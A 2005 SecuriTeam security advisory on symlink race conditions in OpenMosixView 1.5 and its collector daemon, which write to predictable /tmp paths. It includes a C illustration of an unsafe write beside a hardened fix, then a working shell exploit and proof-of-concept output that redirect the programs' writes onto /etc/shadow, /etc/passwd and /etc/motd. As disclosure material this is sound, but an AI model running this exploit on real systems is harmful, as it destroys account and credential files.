[UNIX] OpenMosixView Multiple Race Conditions
From: SecuriTeam (support_at_securiteam.com)
Date: 03/28/05
To: list@securiteam.com Date: 28 Mar 2005 10:14:14 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
OpenMosixView Multiple Race Conditions
------------------------------------------------------------------------
SUMMARY
<http://www.openmosixview.com/> OpenMosix is "a Linux kernel extension
for single-system image clustering which turns a network of ordinary
computers into a supercomputer".
Both OpenMosixView and its openmosixcollector daemon write their data to
fixed, predictable paths under the world-writable /tmp directory without
checking whether the path already exists or is a symbolic link. A local
attacker who plants symlinks at those names can therefore have arbitrary
files on the system truncated and overwritten with the programs' output
(the proof of concept below redirects the writes onto /etc/shadow and
/etc/passwd).
DETAILS
Vulnerable Systems:
* OpenMosixView version 1.5 and prior
Each time the openmosixcollector daemon is started, it stores the load data
it collects, and its history, in the fixed directory
/tmp/openmosixcollector, which is organised in several files:
[ file ] cluster
[ file ] IDnode-n (one file per cluster node n)
[ file ] sync.count
[ dir ] phist
Because these names are predictable and the directory lives in /tmp, a local
attacker can rebuild the expected directory tree in advance, with symlinks in
place of the data files; when the daemon next starts it follows the symlinks
and overwrites whatever the attacker pointed them at. The same applies to
OpenMosixView, which writes its node list to the fixed path /tmp/nodes.tmp.
If openmosixcollector is already running there is still a way in: every
12 hours the daemon saves its current history to a backup directory in /tmp
whose name is derived from the date and is therefore predictable (see the
exploit below for more details).
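The unsafe write pattern that underlies both the fixed-name files and the
date-named backup directory, beside a hardened version, as an added
illustration: this is not openmosixcollector or OpenMosixView source (the
real code is not on this page), and the function names, the scratch
directory under /tmp and the sample contents are placeholders chosen for the
demonstration.

```c
/* Added illustration of the /tmp symlink problem described above.
 * Not OpenMosix code; names, paths and data are placeholders. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Unsafe: fopen(path, "w") follows whatever symlink another local user
 * planted at the predictable name, so the victim's file is truncated and
 * filled with our data (the effect the PoC shows on /etc/shadow). */
int unsafe_save(const char *path, const char *data)
{
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(data, f);
    fclose(f);
    return 0;
}

/* Hardened: O_NOFOLLOW refuses a symlink at the final component, O_EXCL
 * refuses any pre-existing entry, and the fstat() check confirms we opened
 * a fresh regular file of our own with no extra hard links. A failure of
 * any of these means the path was pre-staged, so nothing is written. */
int safe_save(const char *path, const char *data)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;                 /* EEXIST or ELOOP: refused */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    size_t len = strlen(data);
    if (write(fd, data, len) != (ssize_t)len) { close(fd); return -1; }
    close(fd);
    return 0;
}

/* Self-contained re-enactment of the attack: a private scratch directory
 * (mkdtemp gives an unpredictable 0700 name, which is also the right way
 * to replace the fixed /tmp/openmosixcollector and its _<date> backup),
 * a "victim" file standing in for /etc/passwd, and a symlink "cluster"
 * pointing at it, exactly as the PoC plants it.  Returns 1 when the unsafe
 * writer clobbers the victim and the hardened one refuses, else 0. */
int demo_symlink_attack(void)
{
    char dir[] = "/tmp/omdemo.XXXXXX";      /* placeholder scratch dir */
    char victim[PATH_MAX], link[PATH_MAX], buf[64];
    const char *payload = "192.168.0.11\n"; /* what the daemon would write */
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/cluster", dir);

    FILE *v = fopen(victim, "w");            /* victim has content first */
    if (!v) return 0;
    fputs("root:x:0:0:root:/root:/bin/sh\n", v);
    fclose(v);
    if (symlink(victim, link) < 0) return 0; /* attacker: ln -sf victim cluster */

    int unsafe_rc = unsafe_save(link, payload); /* follows the link */
    int safe_rc = safe_save(link, payload);     /* must refuse */

    FILE *r = fopen(victim, "r");            /* what does the victim hold now? */
    if (!r) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, r);
    buf[n] = '\0';
    fclose(r);
    unlink(link); unlink(victim); rmdir(dir);
    return unsafe_rc == 0 && strcmp(buf, payload) == 0 && safe_rc == -1;
}

int main(void)
{
    printf("symlink attack re-enacted as expected: %s\n",
           demo_symlink_attack() ? "yes" : "no");
    return 0;
}
```

The O_EXCL|O_NOFOLLOW open is the minimal fix for a single file; it makes a planted symlink or file an error (ELOOP or EEXIST) instead of a redirected write. For the daemon's whole tree, and for the 12-hourly backup, the cleaner fix is to stop using a name anyone can guess at all: either mkdtemp() as in the demo, or a root-owned directory outside /tmp.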
Exploit:
#!/bin/sh
###############################################
# RX_oMcollector_proof.sh
# OpenMosixCollector exploit [25/03/2005]
# by Gangstuck and Psirac <research@rexotec.com>
###############################################
# -- Choose targets: each one is truncated and overwritten by the
#    victim process when it writes through the planted symlink.
TARGET1="/etc/shadow"   # OM view target (written via /tmp/nodes.tmp)
TARGET2="/etc/passwd"   # OM collector target 1 (written via cluster)
TARGET3="/etc/motd"     # OM collector target 2 (written via sync.count)
# -- OpenMosixCollector temporary directory (without final '/')
OMCTDIR="/tmp/openmosixcollector"
echo "--------------------------------------------------------"
echo "- -= OpenMosixView and OpenMosixCollector =- -"
echo "- Symlink Vulnerability PoC -"
echo "- [versions 1.5 and minor] -"
echo "--------------------------------------------------------"
echo "- Gangstuck and Psirac -"
echo "- <research@rexotec.com> -"
echo "--------------------------------------------------------"
# -- OM View: openmosixview writes its node list to the fixed path
#    /tmp/nodes.tmp, so a symlink there redirects that write.
ln -sf "$TARGET1" /tmp/nodes.tmp
if [ $? -eq 0 ]; then
    echo "[+] OpenMosixView attack successfully launched."
    echo -e " - target is ${TARGET1}\n"
else
    echo "[!] Failed to exploit OpenMosixView..."
fi
# -- OM Collector: the daemon populates $OMCTDIR at start, so the tree
#    has to be planted before it is started.
if [ -d "$OMCTDIR" ]; then
    echo -e "[!] Openmosix is already running.\n
Anyway, there is a way to exploit this case but this is not
implemented in this public exploit. OpenMosixcollector-daemon
automatically restarts every 12 hours and saves the current
history to a directory located in /tmp (glibc: P_tmpdir).
This is done with a predictable temporary
dir name \"${OMCTDIR}_[date]\" where the [date] format
looks like \"18.0.2005-0.0.48\". Have phun :P"
    exit 0
fi
echo -e "[-] OpenMosixCollector seems not to be started..."
echo " - creating fake directory"
mkdir "$OMCTDIR"
if [ $? -ne 0 ]; then
    echo "[!] OpenMosixCollector attack failed !"
    exit 1
fi
echo " - creating symlink attack against "
echo -e "\t> ${TARGET2}" && ln -sf "$TARGET2" "${OMCTDIR}/cluster"
echo -e "\t> ${TARGET3}" && ln -sf "$TARGET3" "${OMCTDIR}/sync.count"
echo "[+] OpenMosixCollector attack successfully launched."
#EOF
Proof of Concept:
$ ./RX_OMcollector_proof.sh
..
$ ls -l /tmp/nodes.tmp
lrwxrwxrwx 1 gang gang 12 2005-02-21 23:18 /tmp/nodes.tmp -> /etc/shadow
# openmosixview &
openMosix is started!
openMosix cluster contains 3 members.
cluster config changed! redraw cluster now.
$ cat /etc/shadow
192.168.0.11
# /etc/init.d/openmosixcollector start
Initializing openMosix...
openMosix configuration was successful :)
# ls -l /tmp/openmosixcollector/
lrwxrwxrwx 1 user user 12 2004-12-21 23:19 cluster -> /etc/passwd
drwxr-xr-x 2 root root 1024 2004-12-21 23:25 phist
lrwxrwxrwx 1 user user 12 2004-12-21 23:19 sync.count -> /etc/motd
# cat /etc/passwd
21.12.2005-23.25.59 5 184 1757 13 3
21.12.2005-23.26.10 5 184 1757 13 3
# cat /etc/motd
ADDITIONAL INFORMATION
The information has been provided by <mailto:research@rexotec.com> rexolab.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.